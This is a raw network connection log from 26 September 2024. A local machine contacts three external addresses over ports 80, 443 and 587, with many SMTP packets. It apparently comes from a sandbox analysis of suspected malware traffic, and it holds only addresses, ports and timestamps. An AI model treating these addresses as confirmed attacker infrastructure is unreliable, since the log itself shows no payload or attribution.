Sep 26, 2024 09:19:41.273241043 CEST	49177	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:41.278507948 CEST	80	49177	193.122.130.0	192.168.2.22
Sep 26, 2024 09:19:41.280991077 CEST	49177	80	192.168.2.22	193.122.130.0
Sep 26, 2024 09:19:41.289381981 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:41.289410114 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:41.289470911 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:41.289855957 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:41.289872885 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:41.901786089 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:41.901868105 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:41.906601906 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:41.906616926 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:41.906923056 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:41.909768105 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:41.951422930 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:42.145571947 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:42.145649910 CEST	443	49179	149.154.167.220	192.168.2.22
Sep 26, 2024 09:19:42.145701885 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:42.149631977 CEST	49179	443	192.168.2.22	149.154.167.220
Sep 26, 2024 09:19:58.594995022 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:19:58.600040913 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:19:58.600147009 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:19:59.252964020 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:19:59.253278971 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:19:59.259113073 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:19:59.427478075 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:19:59.506918907 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:19:59.511867046 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:19:59.680176973 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:19:59.899851084 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:19:59.899930000 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:00.152595043 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:00.344718933 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.520339966 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.520466089 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.520503044 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.520528078 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:00.521472931 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.521518946 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:00.608530998 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.687148094 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:00.692101002 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.859406948 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:00.921113014 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:00.926233053 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.093318939 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.094230890 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.099101067 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.266799927 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.267247915 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.272248030 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.439908981 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.440233946 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.445061922 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.615153074 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.615422010 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.620310068 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.824177980 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.824611902 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.830523014 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.997776031 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:01.998595953 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.998691082 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.998780012 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:01.998848915 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.002430916 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.004245043 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.004275084 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.004303932 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.004313946 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.004347086 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.004359961 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.009177923 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.009242058 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.312999010 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.340157986 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.340329885 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.971997023 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.972095013 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.972136021 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.973608971 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.974606991 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.974637032 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.974664927 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.974879980 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.974906921 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.974930048 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.974958897 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.977108002 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.977137089 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.977165937 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.977212906 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.979635000 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.979695082 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.979921103 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.979948997 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.979969978 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.979975939 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.980004072 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.980009079 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.980036020 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.980055094 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.982039928 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.982091904 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.982103109 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.982131958 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.982156038 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.982178926 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.982202053 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.982251883 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.984584093 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.984611988 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.984656096 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:02.984858036 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.984909058 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.984965086 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.985404015 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.987080097 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.987107992 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.987242937 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.987292051 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:02.989794016 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.067409039 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.067720890 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.072367907 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072488070 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072622061 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072686911 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072823048 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072850943 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072925091 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072952986 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.072981119 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.073029041 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.073055983 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.073082924 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.073108912 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.073134899 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.073162079 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.073189974 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.181853056 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.182137012 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.186806917 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.186866999 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.186894894 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.186922073 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.186975002 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187002897 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187028885 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187081099 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187129974 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187156916 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187184095 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187232971 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187261105 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187287092 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187313080 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187340021 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187366009 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187417984 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187474012 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187501907 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187534094 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187561035 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187587976 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187613010 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187659025 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187685966 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187712908 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187738895 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.187875032 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.188211918 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.193301916 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193358898 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193408012 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193435907 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193464041 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193495035 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193551064 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193579912 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193607092 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193736076 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193763018 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193809986 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193836927 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193864107 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193891048 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193917036 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193943024 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193969965 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.193996906 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194045067 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194072008 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194098949 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194125891 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194152117 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194179058 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194205046 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194231987 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194257975 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.194401979 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.194675922 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.199373007 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199415922 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199443102 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199496031 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199523926 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199551105 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199577093 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199604034 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199665070 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199692011 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199734926 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199762106 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199790955 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199831009 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199857950 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199884892 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199911118 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199939013 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.199990988 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200018883 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200046062 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200072050 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200099945 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200125933 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200153112 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200179100 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200205088 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200232029 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.200378895 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.200438023 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.205385923 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205415010 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205441952 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205468893 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205521107 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205549002 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205575943 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205602884 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205629110 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205674887 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205724001 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205750942 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205777884 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205804110 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.205921888 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.205979109 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.210812092 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.466583014 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:03.570375919 CEST	49181	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:03.717004061 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:04.393352032 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:04.393434048 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:04.393795967 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:04.393855095 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:04.394263983 CEST	587	49180	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:04.394328117 CEST	49180	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:04.395656109 CEST	587	49181	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:04.395725965 CEST	49181	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:05.132533073 CEST	587	49181	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:05.132725000 CEST	49181	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:05.137618065 CEST	587	49181	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:05.230478048 CEST	49181	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:05.235889912 CEST	587	49181	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:05.235975027 CEST	49181	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:15.486154079 CEST	49165	80	192.168.2.22	132.226.247.73
Sep 26, 2024 09:20:15.832921982 CEST	49182	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:15.837904930 CEST	587	49182	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:15.837971926 CEST	49182	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:15.869513035 CEST	49182	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:20:15.874495029 CEST	587	49182	217.12.218.219	192.168.2.22
Sep 26, 2024 09:20:15.874579906 CEST	49182	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:10.622761011 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:10.630096912 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:10.631118059 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:11.370918989 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.371081114 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:11.376074076 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.542587996 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.542742014 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:11.547575951 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.715711117 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.716206074 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:11.721107006 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.902754068 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.902877092 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.902894974 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.902925968 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:11.902926922 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:11.902973890 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:11.992140055 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.000875950 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:12.005731106 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.172755003 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.175633907 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:12.180440903 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.347023964 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.347219944 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:12.352027893 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.519306898 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.519536972 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:12.524363041 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.691251993 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.691517115 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:12.696310043 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.862957001 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:12.863346100 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:12.868163109 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.083110094 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.083283901 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.088064909 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.260087013 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.260691881 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.260760069 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.260824919 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.260890961 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.263747931 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.265476942 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.265542030 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.265575886 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.265590906 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.265640020 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.265707970 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.268547058 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.268829107 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.270426035 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.270441055 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.270494938 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.273652077 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.273699999 CEST	49183	587	192.168.2.22	217.12.218.219
Sep 26, 2024 09:21:13.273746967 CEST	587	49183	217.12.218.219	192.168.2.22
Sep 26, 2024 09:21:13.273804903 CEST	49183	587	192.168.2.22	217.12.218.219
